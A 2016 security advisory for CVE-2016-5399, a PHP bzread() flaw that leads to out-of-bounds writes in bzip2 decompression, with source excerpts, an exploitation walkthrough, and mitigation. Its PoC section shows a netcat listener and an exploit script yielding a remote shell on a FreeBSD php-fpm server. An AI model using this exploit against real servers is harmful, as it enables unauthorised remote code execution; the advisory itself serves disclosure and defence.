PHP 7.0.8 / 5.6.23 / 5.5.37 bzread() OOB Write
Posted on 21 July 2016
PHP 7.0.8, 5.6.23 and 5.5.37 does not perform adequate error handling in its `bzread()' function: php-7.0.8/ext/bz2/bz2.c ,---- | 364 static PHP_FUNCTION(bzread) | 365 { | ... | 382 ZSTR_LEN(data) = php_stream_read(stream, ZSTR_VAL(data), ZSTR_LEN(data)); | 383 ZSTR_VAL(data)[ZSTR_LEN(data)] = '�'; | 384 | 385 RETURN_NEW_STR(data); | 386 } `---- php-7.0.8/ext/bz2/bz2.c ,---- | 210 php_stream_ops php_stream_bz2io_ops = { | 211 php_bz2iop_write, php_bz2iop_read, | 212 php_bz2iop_close, php_bz2iop_flush, | 213 "BZip2", | 214 NULL, /* seek */ | 215 NULL, /* cast */ | 216 NULL, /* stat */ | 217 NULL /* set_option */ | 218 }; `---- php-7.0.8/ext/bz2/bz2.c ,---- | 136 /* {{{ BZip2 stream implementation */ | 137 | 138 static size_t php_bz2iop_read(php_stream *stream, char *buf, size_t count) | 139 { | 140 struct php_bz2_stream_data_t *self = (struct php_bz2_stream_data_t *)stream->abstract; | 141 size_t ret = 0; | 142 | 143 do { | 144 int just_read; | ... | 148 just_read = BZ2_bzread(self->bz_file, buf, to_read); | 149 | 150 if (just_read < 1) { | 151 stream->eof = 0 == just_read; | 152 break; | 153 } | 154 | 155 ret += just_read; | 156 } while (ret < count); | 157 | 158 return ret; | 159 } `---- The erroneous return values for Bzip2 are as follows: bzip2-1.0.6/bzlib.h ,---- | 038 #define BZ_SEQUENCE_ERROR (-1) | 039 #define BZ_PARAM_ERROR (-2) | 040 #define BZ_MEM_ERROR (-3) | 041 #define BZ_DATA_ERROR (-4) | 042 #define BZ_DATA_ERROR_MAGIC (-5) | 043 #define BZ_IO_ERROR (-6) | 044 #define BZ_UNEXPECTED_EOF (-7) | 045 #define BZ_OUTBUFF_FULL (-8) | 046 #define BZ_CONFIG_ERROR (-9) `---- Should the invocation of BZ2_bzread() fail, the loop would simply be broken out of (bz2.c:152) and execution would continue with bzread() returning RETURN_NEW_STR(data). According to the manual [1], bzread() returns FALSE on error; however that does not seem to ever happen. Due to the way that the bzip2 library deals with state, this could result in an exploitable condition if a user were to call bzread() after an error, eg: ,---- | $data = ""; | while (!feof($fp)) { | $res = bzread($fp); | if ($res === FALSE) { | exit("ERROR: bzread()"); | } | $data .= $res; | } `---- Exploitation ============ One way the lack of error-checking could be abused is through out-of-bound writes that may occur when `BZ2_decompress()' (BZ2_bzread() -> BZ2_bzRead() -> BZ2_bzDecompress() -> BZ2_decompress()) processes the `pos' array using user-controlled selectors as indices: bzip2-1.0.6/decompress.c ,---- | 106 Int32 BZ2_decompress ( DState* s ) | 107 { | 108 UChar uc; | 109 Int32 retVal; | ... | 113 /* stuff that needs to be saved/restored */ | 114 Int32 i; | 115 Int32 j; | ... | 118 Int32 nGroups; | 119 Int32 nSelectors; | ... | 167 /*restore from the save area*/ | 168 i = s->save_i; | 169 j = s->save_j; | ... | 172 nGroups = s->save_nGroups; | 173 nSelectors = s->save_nSelectors; | ... | 195 switch (s->state) { | ... | 286 /*--- Now the selectors ---*/ | 287 GET_BITS(BZ_X_SELECTOR_1, nGroups, 3); | 288 if (nGroups < 2 || nGroups > 6) RETURN(BZ_DATA_ERROR); | 289 GET_BITS(BZ_X_SELECTOR_2, nSelectors, 15); | 290 if (nSelectors < 1) RETURN(BZ_DATA_ERROR); | 291 for (i = 0; i < nSelectors; i++) { | 292 j = 0; | 293 while (True) { | 294 GET_BIT(BZ_X_SELECTOR_3, uc); | 295 if (uc == 0) break; | 296 j++; | 297 if (j >= nGroups) RETURN(BZ_DATA_ERROR); | 298 } | 299 s->selectorMtf[i] = j; | 300 } | 301 | 302 /*--- Undo the MTF values for the selectors. ---*/ | 303 { | 304 UChar pos[BZ_N_GROUPS], tmp, v; | 305 for (v = 0; v < nGroups; v++) pos[v] = v; | 306 | 307 for (i = 0; i < nSelectors; i++) { | 308 v = s->selectorMtf[i]; | 309 tmp = pos[v]; | 310 while (v > 0) { pos[v] = pos[v-1]; v--; } | 311 pos[0] = tmp; | 312 s->selector[i] = tmp; | 313 } | 314 } | 315 | ... | 613 save_state_and_return: | 614 | 615 s->save_i = i; | 616 s->save_j = j; | ... | 619 s->save_nGroups = nGroups; | 620 s->save_nSelectors = nSelectors; | ... | 640 return retVal; | 641 } `---- bzip2-1.0.6/decompress.c ,---- | 070 #define GET_BIT(lll,uuu) | 071 GET_BITS(lll,uuu,1) `---- bzip2-1.0.6/decompress.c ,---- | 043 #define GET_BITS(lll,vvv,nnn) | 044 case lll: s->state = lll; | 045 while (True) { | ... | 065 } `---- If j >= nGroups (decompress.c:297), BZ2_decompress() would save its state and return BZ_DATA_ERROR. If the caller don't act on the erroneous retval, but rather invokes BZ2_decompress() again, the saved state would be restored (including `i' and `j') and the switch statement would transfer execution to the BZ_X_SELECTOR_3 case -- ie. the preceding initialization of `i = 0' and `j = 0' would not be executed. In pseudocode it could be read as something like: ,---- | i = s->save_i; | j = s->save_j; | | switch (s->state) { | case BZ_X_SELECTOR_2: | s->state = BZ_X_SELECTOR_2; | | nSelectors = get_15_bits... | | for (i = 0; i < nSelectors; i++) { | j = 0; | while (True) { | goto iter; | case BZ_X_SELECTOR_3: | iter: | s->state = BZ_X_SELECTOR_3; | | uc = get_1_bit... | | if (uc == 0) goto done; | j++; | if (j >= nGroups) { | retVal = BZ_DATA_ERROR; | goto save_state_and_return; | } | goto iter; | done: | s->selectorMtf[i] = j; `---- An example selector with nGroup=6: ,---- | 11111111111110 | ||||| `|||||| `- goto done; s->selectorMtf[i] = 13; | `A' j++; | j++; goto save_state_and_return; | goto iter; `---- Since the selectors are used as indices to `pos' in the subsequent loop, an `nSelectors' amount of <= 255 - BZ_N_GROUPS bytes out-of-bound writes could occur if BZ2_decompress() is invoked in spite of a previous error. bzip2-1.0.6/decompress.c ,---- | 304 UChar pos[BZ_N_GROUPS], tmp, v; | 305 for (v = 0; v < nGroups; v++) pos[v] = v; | 306 | 307 for (i = 0; i < nSelectors; i++) { | 308 v = s->selectorMtf[i]; | 309 tmp = pos[v]; | 310 while (v > 0) { pos[v] = pos[v-1]; v--; } | 311 pos[0] = tmp; | 312 s->selector[i] = tmp; | 313 } `---- bzip2-1.0.6/bzlib_private.h ,---- | 121 #define BZ_N_GROUPS 6 `---- PoC === Against FreeBSD 10.3 amd64 with php-fpm 7.0.8 and nginx from the official repo [2]: ,---- | $ nc -v -l 1.2.3.4 5555 & | Listening on [1.2.3.4] (family 0, port 5555) | | $ python exploit.py --ip 1.2.3.4 --port 5555 http://target/upload.php | [*] sending archive to http://target/upload.php (0) | | Connection from [target] port 5555 [tcp/*] accepted (family 2, sport 49479) | $ fg | id | uid=80(www) gid=80(www) groups=80(www) | | uname -imrsU | FreeBSD 10.3-RELEASE-p4 amd64 GENERIC 1003000 | | /usr/sbin/pkg query -g "=> %n-%v" php* | => php70-7.0.8 | => php70-bz2-7.0.8 | | cat upload.php | <?php | $fp = bzopen($_FILES["file"]["tmp_name"], "r"); | if ($fp === FALSE) { | exit("ERROR: bzopen()"); | } | | $data = ""; | while (!feof($fp)) { | $res = bzread($fp); | if ($res === FALSE) { | exit("ERROR: bzread()"); | } | $data .= $res; | } | bzclose($fp); | ?> `---- Solution ======== This issue has been assigned CVE-2016-5399 and can be mitigated by calling bzerror() on the handle between invocations of bzip2. Another partial solution has been introduced in PHP 7.0.9 and 5.5.38, whereby the stream is marked as EOF when an error is encountered; allowing this flaw to be avoided by using feof(). However, the PHP project considers this to be an issue in the underlying bzip2 library[3]. Footnotes _________ [1] [https://secure.php.net/manual/en/function.bzread.php] [2] [https://github.com/dyntopia/exploits/tree/master/CVE-2016-5399] [3] [https://bugs.php.net/bug.php?id=72613] -- Hans Jerry Illikainen
